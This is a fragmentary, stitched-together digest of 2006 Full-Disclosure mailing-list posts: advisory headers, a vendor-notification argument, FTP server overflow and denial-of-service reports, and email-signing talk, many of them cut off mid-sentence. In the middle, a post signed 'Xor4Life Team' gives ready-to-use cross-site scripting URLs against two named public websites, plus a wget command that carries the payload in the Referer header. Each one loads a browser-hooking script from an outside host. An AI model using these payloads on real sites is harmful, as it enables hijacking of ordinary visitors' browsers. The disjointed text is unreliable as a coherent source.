On 11/7/06, M. B. Jr. <[EMAIL PROTECTED]> wrote:
> Hello gentlemen, I'm new to the list.
> Hope I can contribute and learn.
>
> Just want to share this thing I'm studying right now.
> It promises to be an interesting initiative from veteran
> researcher HD
This is actually a project by LMH, alt
DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux'
Author: Kevin Finisterre
Vendor(s): http://www.openbase.com
Product: 'OpenBase SQL <=10.0 (?)'
References:
http://www.digitalmunition.com/DMA[2006-1107a].txt
Description:
(regurgitation warning - this may taste VERY familiar)
Hello gentlemen, I'm new to the list.
Hope I can contribute and learn.
Just want to share this thing I'm studying right now.
It promises to be an interesting initiative from veteran researcher HD Moore, founder of Metasploit.
http://projects.info-pull.com/mokb/
Sort of didactic also.
// best reg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:198-1
http://www.mandriva.com/security/
___
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:202
http://www.mandriva.com/security/
___
And did you email the vendor first?
mailto:[EMAIL PROTECTED]
It's listed on his page you know... and have you given them a chance to
fix it or are you "too lazy" to give a vendor a chance to fix things
first before you full-disclosure them?
There are some vendors that yeah.. it's hard to argue
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:201
http://www.mandriva.com/security/
___
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:200
http://www.mandriva.com/security/
___
Right. I'm aware of that. I get spam post-dated all the time (so it
will go to the end of the list when sorted by date). I was more thinking
that the mail drive program would get the system time from the OS before
processing new unsigned mail.
Matthew Flaschen
Darkz wrote:
> Matthew Flaschen wrot
http://www.ratp.info/Pivi/index.php?aar=bar%3C/textarea%3E%3Cscript+src=http://dcBeef.net/hook/beefmagic.js.php%3E%3C/script%3E
http://www.ratp.info/Pivi/index.php?adp=bar%3C/textarea%3E%3Cscript+src=http://dcBeef.net/hook/beefmagic.js.php%3E%3C/script%3E
--Xor4Life Team--
* By the referrer:
wget --no-cache
--referer="%22%3E%3Cscript%0Asrc%3Dhttp%3A%2F%2FdcBeef.net%2Fhook%2Fbeefmagic.js.php%3E%3C%2Fscript%3E%3Ca%0Aname%3D%22"
"http://www.laredoute.fr/product.aspx?ProductID=324106955&DocumentID=222306";
* By the URL:
http://www.laredoute.fr/category
Hi K F,
No, I also thought the same but not. Internally (when
looking into it with a debugger) the "%s" characters
are expanded to something. If you try the same
exploit changing "%s" with, i.e., "%x" it doesn't
work.
I tried with various other combinations and,
strangely, it only works with t
Hi,
Anyone got a security contact for GoAhead Embedded Web Server?
Thanks
Gary
Sec-1 specialises in the provision of network security solutions. For more
information on products and services we offer visit www.sec-1.com or call 0113
257 8955.
___
Fu
we are going to tell your professor that you are cheating!!
-JP
On 11/6/06, kijs kijs <[EMAIL PROTECTED]> wrote:
> hi all
> Last week, I'm looking for indexing information for Forensics. Is not
> understood very much regarding some questions:
>
> Questions 1:
> | Pr [ x(i1) x(i2)...x(ik) = a ] - 2
WFTPD Pro Server 3.23 Buffer Overflow
-
A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwriting EIP
is quite easy but I'm too lazy...
Attached goes
WarFTPd 1.82.00-RC11 Remote Denial Of Service
-
WarFTPd is vulnerable to a DOS condition when passing
to various commands a long string with
two times the "%s" character(s) inside. It looks as
non exploitable as the problem crashes with
the same output
it's a joke about IE7..
- Original Message -
From: "Tyop?" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, November 07, 2006 8:46 AM
Subject: Re: [Full-disclosure] Microsoft Firefox?
> On 11/7/06, Zachary Miller <[EMAIL PROTECTED]> wrote:
>> On Nov 6, 2006, at 1:34 PM, imipak wrote:
>> > Simo
Matthew Flaschen wrote:
Just set it to only accept signed messages starting from a certain date.
Matthew Flaschen
Darkz wrote:
Matthew Flaschen wrote:
Why can't message signing offer backwards compatibility (assuming you
use multipart/signed)?
Matthew Flaschen
D